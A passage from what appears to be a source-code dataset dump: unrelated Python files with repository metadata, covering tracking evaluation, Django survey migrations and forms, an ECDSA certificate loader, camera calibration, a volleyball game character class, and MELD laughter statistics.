#
# gt_bboxes, gt_ids = defaultdict(list), defaultdict(list)
# for cat_id in cat_ids:
# for i in annsByAttr[img_id][cat_id]:
# ann = anns['annotations'][i]
# gt_bboxes[cat_id].append(ann['bbox'])
# gt_ids[cat_id].append(ann['instance_id'])
# distances = mm.distances.iou_matrix(
# gt_bboxes[cat_id], pred_bboxes[cat_id], max_iou=0.5)
# track_acc[cat_id][img['video_id']].update(gt_ids[cat_id],
# pred_ids[cat_id],
# distances)
#
# # eval for track
# print('Generating matchings and summary...')
# empty_cat = []
# for cat, video_track_acc in track_acc.items():
# for vid, v in video_track_acc.items():
# if len(v._events) == 0:
# empty_cat.append([cat, vid])
# for cat, vid in empty_cat:
# track_acc[cat].pop(vid)
#
# names, acc = [], []
# for cat, video_track_acc in track_acc.items():
# for vid, v in video_track_acc.items():
# name = '{}_{}'.format(cat, vid)
# if split_camera:
# name += '_{}'.format(video_camera_mapping[vid])
# names.append(name)
# acc.append(v)
#
# metrics = [
# 'mota', 'motp', 'num_misses', 'num_false_positives', 'num_switches',
# 'mostly_tracked', 'mostly_lost', 'idf1'
# ]
#
# print('Evaluating box tracking...')
# mh = mm.metrics.create()
# summary = mh.compute_many(
# acc,
# metrics=[
# 'num_objects', 'motp', 'num_detections', 'num_misses',
# 'num_false_positives', 'num_switches', 'mostly_tracked',
# 'mostly_lost', 'idtp', 'num_predictions'
# ],
# names=names,
# generate_overall=False)
# if split_camera:
# summary['camera_id'] = summary.index.str.split('_').str[-1]
# for camera_id, summary_ in summary.groupby('camera_id'):
# print('\nEvaluating camera ID: ', camera_id)
# aggregate_eval_results(
# summary_,
# metrics,
# list(track_acc.keys()),
# mh,
# generate_overall=True,
# class_average=class_average)
#
# print('\nEvaluating overall results...')
# summary = aggregate_eval_results(
# summary,
# metrics,
# list(track_acc.keys()),
# mh,
# generate_overall=True,
# class_average=class_average)
#
# print('Evaluation finishes with {:.2f} s'.format(time.time() - t))
#
# out = {k: v for k, v in summary.to_dict().items()}
# return out
def tao_evaluation(tao_ann_file, anns, results_coco_format):
from tao.toolkit.tao import TaoEval
############################## debugging code to make sure we are using TaoEval correctly
############################## we pass the gt ann as predictions
# annos = anns['annotations']
# for ann in annos:
# ann['score'] = 1
# import logging
# logger = logging.getLogger()
# logger.setLevel(logging.INFO)
# tao_eval = TaoEval(tao_ann_file, annos)
# # tao_eval = TaoEval(tao_ann_file, annos[:len(annos)//2])
# import pdb;pdb.set_trace()
# tao_eval.run()
# tao_eval.print_results()
############################## end debugging code
# convert results from coco format to tao format
global_instance_id = 0
results_tao_format = []
for img, results_in_img in zip(anns['images'], results_coco_format):
img_id = img['id']
if img['frame_id'] == 0:
global_instance_id += 10000 # shift it 10000 to restart counting in next video
for instance_id, result in results_in_img.items():
instance_id = int(instance_id) + global_instance_id
result_tao_format = {
"image_id": img_id,
"category_id": result['label'] + 1, # coco labels are 1-based
"bbox": xyxy2xywh(result['bbox'][:-1]),
"score": result['bbox'][-1],
"track_id": instance_id,
"video_id": img['video_id'],
}
results_tao_format.append(result_tao_format)
import logging
logger = logging.getLogger()
logger.setLevel(logging.INFO)
tao_eval = TaoEval(tao_ann_file, results_tao_format)
tao_eval.run()
tao_eval.print_results()
results = tao_eval.get_results()
return results
| 35.912921 | 101 | 0.551975 | 1,605 | 12,785 | 4.192523 | 0.187539 | 0.022292 | 0.009362 | 0.005944 | 0.265716 | 0.254718 | 0.215634 | 0.196314 | 0.178778 | 0.174469 | 0 | 0.012055 | 0.312241 | 12,785 | 355 | 102 | 36.014085 | 0.753213 | 0.382871 | 0 | 0.051429 | 0 | 0 | 0.077914 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 1 | 0.034286 | false | 0 | 0.051429 | 0.005714 | 0.12 | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a299898b1c3a86c88536543a8e7bfba9ea1a930e | 6,027 | py | Python | encuestas/migrations/0004_auto_20180412_2056.py | CARocha/cafod-joa | e207b29375cd1f2219086b54ec6280e5c5789c32 | [
"MIT"
] | 1 | 2021-11-05T11:33:01.000Z | 2021-11-05T11:33:01.000Z | encuestas/migrations/0004_auto_20180412_2056.py | CARocha/cafod-joa | e207b29375cd1f2219086b54ec6280e5c5789c32 | [
"MIT"
] | 6 | 2020-06-05T18:13:39.000Z | 2022-01-13T00:45:03.000Z | encuestas/migrations/0004_auto_20180412_2056.py | CARocha/cafod-joa | e207b29375cd1f2219086b54ec6280e5c5789c32 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import multiselectfield.db.fields
class Migration(migrations.Migration):
dependencies = [
('encuestas', '0003_auto_20180406_0353'),
]
operations = [
migrations.AlterModelOptions(
name='distribucionupf',
options={'verbose_name_plural': 'Ditribuci\xf3n de la tierra en la UPF'},
),
migrations.RemoveField(
model_name='cultivosanuales',
name='area_cosechada',
),
migrations.RemoveField(
model_name='cultivoshuerto',
name='area_cosechada',
),
migrations.AlterField(
model_name='condicionesvida',
name='escolaridad',
field=models.IntegerField(choices=[(1, b'Ning\xc3\xban estudio'), (2, b'Primaria incompleta'), (3, b'Primaria completa'), (4, b'Secundaria incompleta'), (5, b'Secundaria completa (o bachiller)'), (6, b'carrera universitarios incompleta'), (7, b'carrera universitaria completa')]),
),
migrations.AlterField(
model_name='cultivos',
name='unidad_medida',
field=models.IntegerField(choices=[(1, b'Quintal(100kg)'), (2, b'Libras'), (3, b'Docena'), (4, b'Cien'), (5, b'Cabeza'), (6, b'Litro'), (7, b'Unidad'), (8, b'Kilo')]),
),
migrations.AlterField(
model_name='cultivosanuales',
name='consumo_animal',
field=models.FloatField(verbose_name=b'Semilla'),
),
migrations.AlterField(
model_name='cultivoshuerto',
name='consumo_animal',
field=models.FloatField(verbose_name=b'Semilla'),
),
migrations.AlterField(
model_name='cultivoshuertos',
name='unidad_medida',
field=models.IntegerField(choices=[(1, b'Quintal(100kg)'), (2, b'Libras'), (3, b'Docena'), (4, b'Cien'), (5, b'Cabeza'), (6, b'Litro'), (7, b'Unidad'), (8, b'Kilo')]),
),
migrations.AlterField(
model_name='detallemiembros',
name='cantidad_dependen',
field=models.IntegerField(verbose_name=b'1.5-\xc2\xbfCu\xc3\xa1ntas personas dependen economicamente del encuestado/a?'),
),
migrations.AlterField(
model_name='duenosi',
name='si',
field=models.IntegerField(choices=[(1, b'A nombre del hombre'), (2, b'A nombre de la mujer'), (3, b'A nombre de ambos'), (4, b'A nombre de los hijos'), (5, b'A nombre de los hijas'), (6, b'A nombre de padres'), (7, b'A nombre de otros')]),
),
migrations.AlterField(
model_name='escasezalimentos',
name='agricola',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=9, null=True, verbose_name=b'Razones agr\xc3\xadcolas', choices=[(b'A', b'Falta o perdida de semilla'), (b'B', b'Mala calidad de la semilla'), (b'C', b'Falta de riego'), (b'D', b'Poca Tierra o baja fertilidad'), (b'E', b'Plagas y enfermedades')]),
),
migrations.AlterField(
model_name='escasezalimentos',
name='considera',
field=models.IntegerField(verbose_name=b'4.4-Si no cuenta siempre con suficientes alimentos, indicar las principales razones', choices=[(1, b'Si'), (2, b'No')]),
),
migrations.AlterField(
model_name='escasezalimentos',
name='economica',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=7, null=True, verbose_name=b'Razones econ\xc3\xb3micas', choices=[(b'A', b'Bajo precio de sus productos agr\xc3\xadcolas en el mercado'), (b'B', b'Falta de mercado'), (b'C', b'Falta de credito'), (b'D', b'Falta de mano de obra')]),
),
migrations.AlterField(
model_name='escasezalimentos',
name='fenomeno',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=9, null=True, verbose_name=b'Fen\xc3\xb3menos naturales', choices=[(b'A', b'Sequ\xc3\xada'), (b'B', b'Inundaci\xc3\xb3n'), (b'C', b'Deslizamiento'), (b'D', b'Incendios'), (b'E', b'Heladas/Granizo')]),
),
migrations.AlterField(
model_name='frutas',
name='unidad_medida',
field=models.IntegerField(choices=[(1, b'Quintal(100kg)'), (2, b'Libras'), (3, b'Docena'), (4, b'Cien'), (5, b'Cabeza'), (6, b'Litro'), (7, b'Unidad'), (8, b'Kilo')]),
),
migrations.AlterField(
model_name='organizacionsocialproductiva',
name='cuales_beneficios',
field=models.ManyToManyField(to='encuestas.BeneficiosOrganizados', verbose_name=b'3.1.2-\xc2\xbfPor qu\xc3\xa9 decidi\xc3\xb3 integrar estas organizaciones?', blank=True),
),
migrations.AlterField(
model_name='seguridadalimentaria',
name='escasez',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=15, null=True, verbose_name=b'4.3-Qu\xc3\xa9 es lo que hace cuando hay escasez de alimentos en la familia', choices=[(b'A', b'Busca trabajo fuera de la UPF'), (b'B', b'Recibe remesas familiares'), (b'C', b'Se endeuda'), (b'D', b'Vende alg\xc3\xban bien'), (b'E', b'Pide donaci\xc3\xb3n de alimentos al estado o iglesia'), (b'F', b'Pide alimentos a familiares'), (b'G', b'Pasa hambre'), (b'H', b'Trueque de productos')]),
),
migrations.AlterField(
model_name='usosemilla',
name='compradas_agroservicio',
field=models.FloatField(verbose_name=b'4.5.2-Compradas en un agroservicio'),
),
migrations.AlterField(
model_name='usosemilla',
name='tipo_semilla',
field=multiselectfield.db.fields.MultiSelectField(blank=True, max_length=5, null=True, verbose_name=b'4.5.1-Tipos de semilla usadas en UPF', choices=[(b'A', b'Nativas'), (b'B', b'Acriolladas'), (b'C', b'Mejoradas/certificadas')]),
),
]
| 55.805556 | 505 | 0.612411 | 737 | 6,027 | 4.933514 | 0.303935 | 0.044554 | 0.110011 | 0.127613 | 0.418867 | 0.405391 | 0.261001 | 0.261001 | 0.261001 | 0.209021 | 0 | 0.023907 | 0.229633 | 6,027 | 107 | 506 | 56.327103 | 0.759207 | 0.003484 | 0 | 0.584158 | 0 | 0.019802 | 0.349434 | 0.025316 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029703 | 0 | 0.059406 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a299c702e5812c968bd896561ae3de285029c637 | 940 | py | Python | site/user/forms.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | 1 | 2019-10-16T01:44:06.000Z | 2019-10-16T01:44:06.000Z | site/user/forms.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | 3 | 2019-05-30T22:09:43.000Z | 2020-01-10T01:03:24.000Z | site/user/forms.py | paulohenriquerosa/gnss-iot-server | 6e7ff39bc83276d6ad86121083eb48d134d00f9d | [
"MIT"
] | 3 | 2019-02-25T22:35:47.000Z | 2020-05-24T09:41:10.000Z | from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
class RegisterForm(UserCreationForm):
email = forms.EmailField(label="Email", required=True,
help_text='Required. Enter a valid email address.')
name = forms.CharField(label="Name", required=True)
class Meta:
model = User
fields = ('username','name', 'email')
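# Minimal usage sketch (the surrounding Django view code is assumed, not part
# of this module): bind POST data, validate (which runs clean_email below),
# then persist with save_all().
#   form = RegisterForm(request.POST)
#   if form.is_valid():
#       user = form.save_all()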
def clean_email(self, *args, **kwargs):
email = self.cleaned_data['email']
if User.objects.filter(email=email):
raise forms.ValidationError('Email already exists.')
else:
return email
def save_all(self, commit=True):
user = super(RegisterForm, self).save(commit=False)
user.name = self.cleaned_data['name']
user.email = self.cleaned_data['email']
if commit:
user.save()
return user | 30.322581 | 81 | 0.629787 | 108 | 940 | 5.425926 | 0.453704 | 0.051195 | 0.076792 | 0.071672 | 0.09215 | 0.09215 | 0 | 0 | 0 | 0 | 0 | 0 | 0.259574 | 940 | 31 | 82 | 30.322581 | 0.841954 | 0 | 0 | 0 | 0 | 0 | 0.10627 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086957 | false | 0 | 0.130435 | 0 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a299d314e785da5a3ee9a2279edb7558bf1e0ecf | 1,399 | py | Python | lz_hub/lz_hub_certbag.py | Lennerados/lazarus | 20b116bb279f097655715ee0811167bc3bbdb3fb | [
"Apache-2.0"
] | 1 | 2022-02-23T13:06:47.000Z | 2022-02-23T13:06:47.000Z | lz_hub/lz_hub_certbag.py | Lennerados/lazarus | 20b116bb279f097655715ee0811167bc3bbdb3fb | [
"Apache-2.0"
] | 1 | 2022-01-19T12:49:27.000Z | 2022-01-19T12:49:27.000Z | lz_hub/lz_hub_certbag.py | Lennerados/lazarus | 20b116bb279f097655715ee0811167bc3bbdb3fb | [
"Apache-2.0"
] | 4 | 2021-12-09T13:21:43.000Z | 2022-01-29T09:24:15.000Z | #!/usr/bin/env python3
import ecdsa
import struct
import hashlib
import OpenSSL
import open_ssl_wrapper as osw
count = 0
class hub_certbag:
def __init__(self, cert_path):
self.cert_path = cert_path
self.hub_cert = None
self.hub_sk = None
self.hub_sk_ecdsa = None
def load(self):
self.hub_cert = osw.load_cert(self.cert_path + "/hub_cert.pem")
if self.hub_cert is None:
return False
self.hub_sk = osw.load_privatekey(self.cert_path + "/hub_sk.pem")
if self.hub_sk is not None:
tmp = OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_ASN1, self.hub_sk)
self.hub_sk_ecdsa = ecdsa.SigningKey.from_der(tmp, hashfunc=hashlib.sha256)
else:
return False
return True
def print_pub_key(self, cert):
tmp = ecdsa.VerifyingKey.from_pem(osw.dump_publickey(cert.get_pubkey()))
pubkey = struct.pack('B64s', 0x4, ecdsa.VerifyingKey.to_string(tmp))
print("key: %s" %("".join("{:02x} ".format(x) for x in pubkey[:20])))
def print_data(data, info):
try:
print("%s: %s" %(info, "".join("{:02x} ".format(x) for x in data)))
except Exception as e:
print("WARN: Could not print data - %s" %str(e))
def test():
cert_path = "/home/simon/repos/lazarus/lz_hub/certificates"
cb = hub_certbag(cert_path)
cb.load() | 29.145833 | 91 | 0.635454 | 205 | 1,399 | 4.136585 | 0.404878 | 0.074292 | 0.063679 | 0.03066 | 0.04717 | 0.04717 | 0.04717 | 0 | 0 | 0 | 0 | 0.015009 | 0.238027 | 1,399 | 48 | 92 | 29.145833 | 0.780488 | 0.015011 | 0 | 0.055556 | 0 | 0 | 0.095065 | 0.032656 | 0 | 0 | 0.002177 | 0 | 0 | 1 | 0.138889 | false | 0 | 0.138889 | 0 | 0.388889 | 0.138889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a29dc8a60f789df2afe413d065850ad69819ef71 | 1,639 | py | Python | calibration/mm2pix.py | JaledMC/utils | 284a980f56cc36f9f8c69e650386e3ce771de565 | [
"MIT"
] | null | null | null | calibration/mm2pix.py | JaledMC/utils | 284a980f56cc36f9f8c69e650386e3ce771de565 | [
"MIT"
] | 2 | 2020-03-01T02:54:09.000Z | 2020-03-16T09:50:48.000Z | calibration/mm2pix.py | JaledMC/utils | 284a980f56cc36f9f8c69e650386e3ce771de565 | [
"MIT"
] | null | null | null | import cv2
from chessCalibrate import calculate_matrix
points = []
def button_call(event, x, y, flags, param):
global points
if event == cv2.EVENT_LBUTTONDBLCLK:
if len(points) == 1:
points.append((x, y))
print("X pixels: ", abs(points[0][0] - points[1][0]))
print("Y pixels: ", abs(points[0][1] - points[1][1]))
else:
points = [(x, y)]
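# Interaction sketch: the first double-click stores a point and the second
# prints |dx| and |dy| in pixels; dividing a known physical length in mm by
# those pixel counts gives the mm-per-pixel scale this script is named after.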
def drawing(image, points, color=(255, 0, 0), thick=10):
for point in points:
cv2.circle(image, point, thick, color, -1)
if len(points) == 2:
cv2.line(image, points[0], points[1], color, thick)
return image
def setup_matrix(path, image):
ret, mtx, dist, rvecs, tvecs = calculate_matrix(path)
h, w = image.shape[:2]
newcameramtx, roi = cv2.getOptimalNewCameraMatrix(mtx, dist, (w, h), 1, (w, h))
return newcameramtx, roi, mtx, dist
def undistort(frame, newcameramtx, roi, mtx, dist):
dst = cv2.undistort(frame, mtx, dist, None, newcameramtx)
x, y, w, h = roi
return dst[y:y+h, x:x+w]
def main():
src = cv2.VideoCapture(2)
cv2.namedWindow('frame')
cv2.setMouseCallback('frame', button_call)
_, frame = src.read()
newcameramtx, roi, mtx, dist = setup_matrix("CornersDetected", frame)
while True:
ret, frame = src.read()
frame = undistort(frame, newcameramtx, roi, mtx, dist)
frame = drawing(frame, points)
cv2.imshow('frame', frame)
key = cv2.waitKey(20)
if key == 27: # Esc key to exit
break
src.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
| 27.779661 | 83 | 0.597315 | 219 | 1,639 | 4.39726 | 0.351598 | 0.050883 | 0.074766 | 0.091381 | 0.074766 | 0.074766 | 0 | 0 | 0 | 0 | 0 | 0.031993 | 0.256254 | 1,639 | 58 | 84 | 28.258621 | 0.757998 | 0.009152 | 0 | 0 | 0 | 0 | 0.035758 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.044444 | 0 | 0.222222 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a29dd6241a46c1dbe6b1a834f3b9003085854ec5 | 8,247 | py | Python | src/Game/character.py | MiguelReuter/Volley-ball-game | 67d830cc528f3540b236d8191f582adb1827dbde | [
"MIT"
] | 4 | 2019-04-15T20:39:29.000Z | 2022-02-04T10:51:37.000Z | src/Game/character.py | MiguelReuter/Volley-ball-game | 67d830cc528f3540b236d8191f582adb1827dbde | [
"MIT"
] | null | null | null | src/Game/character.py | MiguelReuter/Volley-ball-game | 67d830cc528f3540b236d8191f582adb1827dbde | [
"MIT"
] | 1 | 2019-11-30T01:05:29.000Z | 2019-11-30T01:05:29.000Z | # encoding : UTF-8
from Engine.Display import debug3D_utils
from Engine.Collisions import AABBCollider
from Settings import *
import pygame as pg
from math import sqrt
from Engine.Actions import ActionObject
from Game.character_states import *
class Character(ActionObject):
def __init__(self, position=None, player_id=PlayerId.PLAYER_ID_1, max_velocity=None, jump_velocity=None):
ActionObject.__init__(self, player_id)
self._position = Vector3(position) if position is not None else Vector3()
self.previous_position = Vector3(self._position)
self.w = CHARACTER_W
self.h = CHARACTER_H
self.collider_relative_position = Vector3()
self.collider = None
self.is_colliding_ball = False
self.max_velocity = max_velocity if max_velocity is not None else RUN_SPEED # m/s
self.jump_velocity = jump_velocity if jump_velocity is not None else JUMP_VELOCITY # m/s
self.velocity = Vector3()
self.direction = Vector3()
self.team = Team()
self.state = Idling(self)
self.set_default_collider()
# sprite
self.rect = pg.Rect(0, 0, 0, 0)
self.rect_shadow = pg.Rect(0, 0, 0, 0)
@property
def position(self):
return self._position
@position.setter
def position(self, value):
self._position = value
self.collider.center = self._position + self.collider_relative_position
def draw_debug(self):
prev_rect = self.rect
prev_shadow_rect = self.rect_shadow
ground_pos = Vector3(self.position)
ground_pos.z = 0
self.rect_shadow = debug3D_utils.draw_horizontal_ellipse(ground_pos, self.w / 2)
self.rect = self.collider.draw_debug()
return [prev_shadow_rect.union(self.rect_shadow), prev_rect.union(self.rect)]
def move_rel(self, dxyz, free_displacement=FREE_DISPLACEMENT):
"""
Move object with a certain displacement.
:param pygame.Vector3 dxyz: displacement
:param bool free_displacement: True if displacement will be not limited on court
:return: None
"""
self.position += Vector3(dxyz)
if not free_displacement:
self.limit_displacement_on_court()
def move(self, direction, dt, free_displacement=FREE_DISPLACEMENT):
"""
Move object along a specified direction and amount of time.
The displacement magnitude depends on:
- :var direction: magnitude
- :var self.max_velocity:
- :var dt:
:param pygame.Vector3 direction: direction of displacement
:param float dt: amount of time in ms. Usually, dt is the time between 2 frames
:param bool free_displacement: True if displacement will be not limited on court
:return: None
"""
dxyz = 0.001 * dt * direction * self.max_velocity
self.move_rel(dxyz, free_displacement)
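# Worked example with hypothetical numbers: at max_velocity = 5 m/s, a unit
# direction and a 16 ms frame give a displacement of 0.001 * 16 * 5 = 0.08 m,
# i.e. dt is expected in milliseconds.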
def limit_displacement_on_court(self):
"""
Limit displacement on court. Called by move_rel method.
:return: None
"""
new_pos = self.position
# net
if self.team.id == TeamId.LEFT:
if self.collider.get_bound_coords(axis=1, m_to_p=True) + self.collider_relative_position.y > 0:
new_pos.y = -self.collider.size3.y / 2 - self.collider_relative_position.y
else:
if self.collider.get_bound_coords(axis=1, m_to_p=False) + self.collider_relative_position.y < 0:
new_pos.y = self.collider.size3.y / 2 - self.collider_relative_position.y
# out of court
f = 1.5
game_engine = Engine.game_engine.GameEngine.get_instance()
court = game_engine.court
if self.team.id == TeamId.LEFT:
new_pos.y = max(-f * court.w / 2, new_pos.y)
else:
new_pos.y = min(f * court.w / 2, new_pos.y)
new_pos.x = max(-f * court.h / 2, new_pos.x)
new_pos.x = min(f * court.h / 2, new_pos.x)
self.position = new_pos
def update_actions(self, action_events, **kwargs):
dt = kwargs["dt"] if "dt" in kwargs.keys() else 0
filtered_action_events = self.filter_action_events_by_player_id(action_events)
# state machine :
# run current state
self.state.run(filtered_action_events, dt=dt)
# eventually switch state
self.state = self.state.next(filtered_action_events, dt=dt)
def update_physics(self, dt, free_displacement=FREE_DISPLACEMENT):
self.previous_position = Vector3(self.position)
self.velocity += Vector3(0, 0, -0.001 * dt * G)
self.move_rel(0.001 * dt * self.velocity, free_displacement)
def get_hands_position(self):
"""
Return hands position of character in world coordinates.
:return: hands position
:rtype pygame.Vector3:
"""
dh = Vector3(0, 0, self.h)
dh.y = self.w / 2
if not self.team.id == TeamId.LEFT:
dh.y *= -1
return self.position + dh
def set_default_collider(self):
"""
Set default AABB Collider.
:return: None
"""
self.collider_relative_position = Vector3(0, 0, self.h / 2)
collider_size3 = Vector3(self.w, self.w, self.h)
self.collider = AABBCollider(self._position + self.collider_relative_position, collider_size3)
def set_diving_collider(self, direction):
"""
Set AABB Collider during diving.
:param pygame.Vector3 direction: direction of diving
:return: None
"""
dive_direction = Vector3(direction)
collider_size3 = Vector3()
collider_size3.x = max(self.w, self.h * abs(dive_direction.x))
collider_size3.y = max(self.w, self.h * abs(dive_direction.y))
collider_size3.z = self.w
collider_rel_center = Vector3(self.h / 2 * dive_direction.x,
self.h / 2 * dive_direction.y,
self.w / 2)
if dive_direction.x < 0:
collider_rel_center.x += self.w / 2
elif dive_direction.x > 0:
collider_rel_center.x -= self.w / 2
if dive_direction.y < 0:
collider_rel_center.y += self.w / 2
elif dive_direction.y > 0:
collider_rel_center.y -= self.w / 2
self.collider_relative_position = collider_rel_center
self.collider = AABBCollider(self._position + self.collider_relative_position, collider_size3)
def reset(self):
self.set_default_collider()
self.velocity = Vector3()
def is_state_type_of(self, state_type):
return self.state.__class__.type == state_type
def get_time_to_run_to(self, target_position, origin_pos=None):
"""
Return the time the character takes to run from an origin to a target position.
The time is computed assuming displacement along the 8 possible directions.
:param pygame.Vector3 target_position: target position
:param pygame.Vector3 origin_pos: origin position. Current character position is default value.
:return: given time in sec
:rtype: float
"""
if origin_pos is None:
origin_pos = self.position
# absolute delta position
delta_pos = target_position - origin_pos
delta_pos = Vector3([abs(delta_pos[i]) for i in (0, 1, 2)])
# diagonal travel
dist_on_each_axis = min(delta_pos.x, delta_pos.y)
diagonal_time = 1.4142 * dist_on_each_axis / self.max_velocity
# orthogonal travel
direct_time = (max(delta_pos.x, delta_pos.y) - dist_on_each_axis) / self.max_velocity
return diagonal_time + direct_time
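# Worked example: for a delta of (3, 4) m at speed v, the character runs
# diagonally over min(3, 4) = 3 m on each axis (1.4142 * 3 / v) and then
# straight for 4 - 3 = 1 m (1 / v), about 5.2426 / v seconds in total.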
def get_time_to_jump_to_height(self, h):
"""
Return the time for the top of the character to reach a specific height by jumping.
The returned time corresponds to the ascending phase.
:param float h: height at which time is given
:return: given time is sec or None if there is no solution
:rtype: float or None
"""
# at t=t1, self.position.z(0) + self.h = h
# -G / 2 * t1**2 + self.jump_velocity * t1 + self.h - h = 0
a, b, c = -G/2, self.jump_velocity, self.h - h
delta = b**2 - 4 * a * c
if delta >= 0:
return (-b + sqrt(delta)) / (2 * a)
else:
return None
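# Note: with a = -G/2 < 0, (-b + sqrt(delta)) / (2 * a) is the smaller of the
# two roots, i.e. the first time the top of the character crosses height h,
# which is the ascending phase promised by the docstring.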
def get_max_height_jump(self):
"""
Return the max height reached by the top of the character by jumping.
:return: max height reached
:rtype: float
"""
a, b, c = -G/2, self.jump_velocity, self.h
delta = b**2 - 4 * a * c
return -delta / (4 * a)
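# Note: -delta / (4 * a) is the value of the parabola a*t**2 + b*t + c at its
# vertex t = -b / (2 * a), i.e. the apex of the jump measured at the top of
# the character (c = self.h).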
class Team:
def __init__(self, team_id=TeamId.NONE, characters_list=None):
self.characters = characters_list
self.score = 0
self.id = team_id
self.set_team_to_characters()
def reset(self, **kwargs):
k = kwargs.keys()
self.characters = kwargs["characters"] if "characters" in k else None
self.set_team_to_characters()
self.score = kwargs["score"] if "score" in k else 0
self.id = kwargs["score"] if "score" in k else TeamId.NONE
def add_score(self, val=1):
self.score += val
def set_team_to_characters(self):
if self.characters is not None:
for ch in self.characters:
ch.team = self | 30.208791 | 106 | 0.716503 | 1,272 | 8,247 | 4.451258 | 0.167453 | 0.040268 | 0.035323 | 0.049452 | 0.338573 | 0.249912 | 0.193748 | 0.145178 | 0.134935 | 0.134935 | 0 | 0.017862 | 0.17861 | 8,247 | 273 | 107 | 30.208791 | 0.817981 | 0.228204 | 0 | 0.102041 | 0 | 0 | 0.007077 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.047619 | 0.013605 | 0.258503 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a29e9157735b72b6a5d4b35ad2209e9c8960ef8a | 8,037 | py | Python | statistics/count_laughter_from_trainsentemocsv.py | hikaruya8/dimotion | 68c1e561e2d26f49ada59a82ed9faae373718033 | [
"MIT"
] | null | null | null | statistics/count_laughter_from_trainsentemocsv.py | hikaruya8/dimotion | 68c1e561e2d26f49ada59a82ed9faae373718033 | [
"MIT"
] | null | null | null | statistics/count_laughter_from_trainsentemocsv.py | hikaruya8/dimotion | 68c1e561e2d26f49ada59a82ed9faae373718033 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
import numpy as np
import os
import pickle
import glob
import re
import pprint
import pandas as pd
detected_folder = '../laughter-detection/detected_train_lauthter/' # folder checked for laughter detection; it contains both detected and undetected subfolders
# laughter_file = 'dia991_utt7/'
df = pd.read_csv('../MELD/data/MELD/train_sent_emo.csv', header=0)
# video_utterances = meld_features[5]
# emotion_labels = meld_features[2]#emotion labels:{'neutral': 0, 'surprise': 1, 'fear': 2, 'sadness': 3, 'joy': 4, 'disgust': 5, 'anger': 6}
# sentiment_labels = meld_features[8] #sentiment labels: {'neutral': 0, 'positive': 1, 'negative': 2}
sample = df[(df['Dialogue_ID'] == 0) & (df['Utterance_ID'] == 3)] # sample DialogueID && UtteranceID
sample_utterance = sample['Utterance'].values.tolist() # sample utterance
def functor(f, l): # recursively apply f to every element of a (possibly nested) list
if isinstance(l,list):
return [functor(f,i) for i in l]
else:
return f(l)
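# Usage example for the helper above (illustrative input, not from the
# original script):
# functor(int, [['991', '7'], ['12', '0']]) -> [[991, 7], [12, 0]]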
# # change to list
# utterance_lists = list(video_utterances.values())
# emotion_label_lists = list(emotion_labels.values())
# sentiment_label_lists = list(sentiment_labels.values())
# sentiment_label_lists_np = np.array(sentiment_label_lists)
# get detected laughter index
laughter_file_path = glob.glob(detected_folder + '*/laugh_0.wav')
laughter_file = [os.path.basename(os.path.dirname(l)) for l in laughter_file_path]
laughter_index = [l.replace('dia', '').replace('utt','').split('_', 1) for l in laughter_file]
laughter_index = functor(int, laughter_index) # laughter_index = [dialogue_index, utterance_index in dialogue]
laughter_index= sorted(laughter_index, key=lambda x: x[0])
# hold current utterance sentiment & previous utterance sentiment
current_neutral = 0
current_positive = 0
current_negative = 0
previous_neutral = 0
previous_positive = 0
previous_negative = 0
# emotion
# label index mapping = {'neutral': 0, 'surprise': 1, 'fear': 2, 'sadness': 3, 'joy': 4, 'disgust': 5, 'anger': 6}
